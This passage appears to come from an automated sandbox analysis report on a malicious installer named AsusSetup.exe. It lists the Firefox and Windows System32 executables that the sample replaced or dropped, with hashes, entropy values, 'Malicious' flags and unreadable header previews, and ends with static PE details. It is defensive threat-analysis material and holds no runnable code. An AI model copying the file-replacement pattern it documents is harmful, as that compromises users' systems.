                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@....................................99.... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1512448
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.9015983625819315
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:RQVTZu0JX/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:SVTZuSLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C30B0904C7860F8C80AD284581CD7228
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:630FB9590F20F24152A95C0C41AC23CA378CA351
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C75CFDC7351744C072D46F3E665F6F4704B1CC6589BE1C2E2D67ABADE6F1A67E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0C901717E4E29AF8B28B6D8D2FD65DABC0C66FD5A2BA51F01AA2575541D3B03604C7A1950F392135B1DB7333281CC8DA407668C7D76BCF1E7521A9FB69D1580B
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................`"........... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...`...........t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1344000
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.801622507982826
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:EC1vpgXcZHzp/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:EC1vpIcNpLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:AEAF957F0BFB3313EDC15FC023BD113C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:ED1409E2A7AE46F708C30A213996F4A4A600E0C6
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3F966E97C8CDA6C7128425C96E7010627E9CC6029370D21077FECBA05ECFBADC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F1E348BEBC8E2BA82351EE20ABAFBD123F21F12D9FF959CD02E298754EFFFD3E379712DFEB9E6928A243819DC84FCF3618D8EC6A8D2B599FF005F632B559E508
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@....................................K6.... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\pingsender.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1355776
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65549499886843
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:TcF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:OLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:B405DD4DEDB10961BF83ADC16A6864A3
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CDB6CEF13CA9541A87F47BFC8CBB42D190F9B700
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4A8C0AE15E266BA488D37655F4F400F20466CE4E399E4E02EE7DEFD2094AD2B3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C4ACBA7E8593B00EE0E66CFBE0B301E72EA0C9E69F172D6F3B5AEA64B82079DD34648FF73A23E6186529719661159E227679A5CE6B2C847B03622F847417BB9E
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@....................................]..... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...`...p......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\plugin-container.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1564160
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.005840216388587
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:YWLntIfGpn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:TRIeBLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:AF1B5057C6BF376130797ADD94B4BE21
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:9664706A328CFF92F4B87003D508F0E292005D1A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3EA31A6D92D4B2E972528478FDE4BAD9D425623772ECC2DF86D66D51BD2B685E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2BF116AC767D7872CB6A0127A0E392D1A43D7688BD3A7D12DF7F9971601A3C92CBE2C4BF1B742081BF849FCFFCD234CA346718693DC3DD4191857722A1F718AA
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@..............................#.....,,.... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...`...........>..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\private_browsing.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1340928
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.616050448505573
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:cIh9iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:dh/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:616E2488479696337B4A3AEEFFFA36A4
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:62412333BCD0EB9E0EBFC695EED63B1790B4567D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B05600BB81CFC6C3A5F1F13CE1B6325875C67EAE81BACEA45FEDE9B2AF3F64E1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:306FEB348F894D5AA5EDF357B6DA4ABC223754883739D10C9F9E6E75BD5FA2AECD636510BC0D332CE052834A19E8872AFEFD46A634A9B9113AC066D01E2DB763
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.......................................... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...`...0......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\updater.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1687552
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.018642594038045
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:N8oRcwt2ioQ3J+RI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:N8oRBoFILNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3E708B9F749B64CE122B3F2AD3A41796
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3325BC2579CD9E8DA27DE1794A4CF5D495FB5ABB
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AABD6B0869E1725DCF733FCA841832100E4239C03D1D2FF69C99D4D95EE043C3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D95815634EFD48A21AF262EA3B115AEE9DEBD617D1E4C4C79242BF2205DCA18977B6124FD8FFEC571B46AD23285386E5C57B9AFE05AEDA9ED9CEEC9F0AB5DB4B
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@..............................%......\.... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...`........... ..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\26169d80e67cd874.bin

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.983311824699206
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:9QTqk9jxlxKQF+2JTcrk+rfJcNqT/HG9qyRLCdx:uTtjxfKhrhTSSWqAOdx
                                                                                                                                                                                                                                                                                                                                                                                        MD5:64475032E4C94472AA7937EDC158EF8B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3A6419AFF218573E840C07BEED86AAB22A15EB7A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A161F087A1357E09548D99E738B48E8983683FA3A5A76151A355323928529F1F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:832E0B2AB4D9F58E16492BDC5EB76DAF6401733A45E6DEF735ECBCAD8A9CC1BA6BE6CA4423F61A1E863559E3000A7F9AA323C2373EB1EAD9F2284EDBE2D73079
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.j~k....{cGrV..k.^.8[".$h..2D^..E..h.h.7/.Q.faG....;..[.g.T..}5....|...<.........Uf.9o.$..".q....Xg<...s_.g.Y.......t..;....i....Q.....^;y.W.....A.J....s.V..l}P@....U..V%..|D.fs..t.G.y.....0.%..F...$..~.9.~.PYJ....#)..7.7}|"....i....Ub#....f+vDV..-.....u..`......n..h......"n.RAK..K.-.),Ek...W,.23...r-.......|ro.gN/.Dc...G...,.vm.K...g:..'......7..N.j]5.S....lpr.%"...a:p._..0..]......U..&.....Y.M>v..Zp....S..Q8?......B.qS..bm|9M)....aK{._+..<Od.......>...$...lK0.....ir.......(..i.p2. qM.p..f.l..4T./.!y.l...#.".sn..,0......2.sz5........:.....x......p.n...\5....8...t..p......dJm....ij........P..;8.0....Fu....k......{.X.-n.-..s...>.I.M.,....i!s....f....r..h.I..G...<...P(K.K...%..mW.r..............?.....Q...n.0g#.@.x..../.%..t.C......J...@t...x.S.B....5Y.u......n..Y..|Q.. ...Qt^Ti..<.Mu......aAx...f..@.d\.4z...t8.D.;.:.sR.|...*..P.I......$..h^}<..n...A.b..WIY..@....*^.X...C.....gO..."f.M..k..w....u....S......i.&,v....&. .R_....!.<*.u.:{|x

                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\AppVClient.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1348608
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.246037405156198
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:0QW4qoNUgslKNX0Ip0MgHCpoMBOuJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:0QW9BKNX0IPgiKMBOuJLNiXicJFFRGNf
                                                                                                                                                                                                                                                                                                                                                                                        MD5:8DF9B4C3E64A3509DEE72C0E8333DDA6
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:586C71B77170FB45C8C46B0DE601920152FDD9E2
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1B5C7E24256B5A901B0CBD3B5CED69076E9183FC08BCF2A7DE036A865DE37171
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5FE9284420E77DA3D20BB171AAF6CE3A56C9F579DB64C6375ED066C38746252DB0DD99DA50A0CD85ED4FF141492FB0831CD02E0CA77FDBB6C34FAA274D9989FA
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.....................................[.... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1379840
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686015796117744
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:52G7AbHjka/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:52G7AbHjTLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:1A548947D8E54C77D587A0F462CFFE45
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5D889BF86B8E8548A2FA561A484C0DF3E85363CE
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9BB345DA07B709A7F521395A292AD6D8BE982308F9CB90E7C51EE092B74873B9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:81EB13A9EA15D0A5058DF8395E7A1FAE31FECF21AA9EDC1834621784504F54B875F8E1966E4E336F202AE0CC89E2C564456DBBF9FA6208737C778A7568B52C79
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.............................. .....:..... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...`...........n..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\FXSSVC.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.2830082491947294
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:ykdpSI+K3S/GWei+qNv2uG3i/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:y6SIGGWei2uG3iLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:0EC424B89B232FD9D839942FBC5274E2
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:49A7881FFF035102B735C2409F16137750ABAE6F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EDB6309AF48980A05CBE829878E8CD601AF52379E5D05B5DDA87C2A973E2D870
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D07E931E5B5C8ACB507D67C8292ED60CEEF163CA0C801EA9D7528F8B9C57FB1DA8215BDC30B539FAFFA5256217008E01F14E947D960309988AD9720FA2CFA983
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......'|.... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\alg.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1381376
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.68639599675767
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:3rL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3rLLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:0E2255EDBB351BDA0949D09F88FA226E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FB928437514C254AA1061150A7A1ABD333EFF026
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F984807B9C42035E6403AED5F2DFE7723A7A13DC8FD43F4A666AFA77926D3CE7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1B1717DDF8AF70A78F80A362845670D37B7EDA9C5B0E3F3B4E3C2ED819AD5E742D997EB9DAA162C97829D860CE1372A3F497D5240A721077F95DE842C1C0F4DF
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.............................. .......... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...`...........t..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Roaming\26169d80e67cd874.bin

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.98598064426651
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:L23U4CxugCzCbeLWpjqI288yqqs0BQvSe1+zHv7XvcxJeByuhjEiJgFFoiIAI3cR:qwfbIWII18WVOSeg7zXie3EsgroTXu11
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3AE78160FC8BEE21000053E946D037C2
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6BE454ED7F1BF8D80B46E84A55CEC8B8D3408F18
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:949F067105C2F2AB580E9C6CC98BCD18FAC428420D9AEA130993F9B5C719322C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:01FAFB3710C47F4C8A239DC9EA4FE51E34328643F2922522627CDE943970D967E62E4480FFCE9325DB00C3FD2D6F26ED5F4639540C4584CCA10A4FF560E733B2
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.,,Q'..!...Q9v........?p..Nr:.5.7.*.......D..2,@..8:..H...@6.O]...a....e?^9.W.#.q.#.a^eo&..C.e..r9...Lq$.L...v...q........,+x.....x.M.S.r>.c......]Bb.\Jp...0..b7.e..q.ly....X".t.....~..........Y#{G.@.._So..@.aTm....a..2d...p/6.m..M...l.3....\Y.c}.Y....a[..,.r.$2%;u..K..<Sy_.+......>.)i..[.).?S..B...R.~..}W..x........~w0L[]..D...v..R.2|8P..So.%....C.Md....?k.w.`.Z....b..6.M.......,O..N5.2u...:j...;.y.....(...3\p.......~q.]Fz.}'..#.....@ .G.8......i...)...]%..b.:]IX.xF8T...1.......i..a.e......K.L.}.....re. D.S'....P...JU.~jJK..#...%Z....E...rez. .+.......'...K..h.<.....Z.=..i....."[.X.a...)......Y.|..p1.....x..?.v9.j.i ..u......*.!...x..Q#j...V.77....@..1.4......J.........2.e....S.........5.%.*..A.7i...T{T\k....v.6..`.R..xz..|/..8...........'.7jw....su1........:%.d..>T.D}..z9s..#EG.h.W..iw.[.......S.!O.z.L.Q.O|..]+.....!`...\2<........./AT.....f.1...E.f-....O.....M.+..\..&.%4&..d;..Z..RY.jr.Z.j.8../..R".;..p.%5.#z(.......BqA.[..p...je[

                                                                                                                                                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.953364197222141
                                                                                                                                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                                                                                                                                        • Win64 Executable GUI (202006/5) 60.38%
                                                                                                                                                                                                                                                                                                                                                                                        • Windows ActiveX control (116523/4) 34.83%
                                                                                                                                                                                                                                                                                                                                                                                        • Win64 Executable (generic) (12005/4) 3.59%
                                                                                                                                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.60%
                                                                                                                                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.60%
                                                                                                                                                                                                                                                                                                                                                                                        File name:AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File size:5'251'072 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5:13bf2819401d2f983fff90c1960831b8
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0b8058088b47edbcf963ac2ac7d5b23fa35e0e90
                                                                                                                                                                                                                                                                                                                                                                                        SHA256:7db9ca7dbe9a5724ef452585280e73a1a73563cc6a2559f2588d613454f70261
                                                                                                                                                                                                                                                                                                                                                                                        SHA512:af83b681f62582e9cbf983f6e5e1ba32c3a6ccd7896c644d77a5d5d76b2ca24af85deb6ea6621a0b29e15ab7637ba9f9606b09fb56387461604c38d8ca85502f
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:pmuSFdw5ujhEMdcbJFLOAkGkzdnEVomFHKnPV7wRGpj3:ChKMdcNFLOyomFHKnPpF9
                                                                                                                                                                                                                                                                                                                                                                                        TLSH:FE36BF4AAFEC40E8D4A6D035C96B895BD7B6BC601631878F1064775F6F333918E2E326
                                                                                                                                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................c.............................................................................m.............Rich...

                                                                                                                                                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                                                                                                                                                        Icon Hash:57171d4de7912e31

                                                                                                                                                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                        Entrypoint:0x1401cacb4
                                                                                                                                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                                                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                                                                                        Time Stamp:0x61615653 [Sat Oct 9 08:44:03 2021 UTC]
                                                                                                                                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                        Import Hash:624b40321b3d0fd2a008a7271554dd30

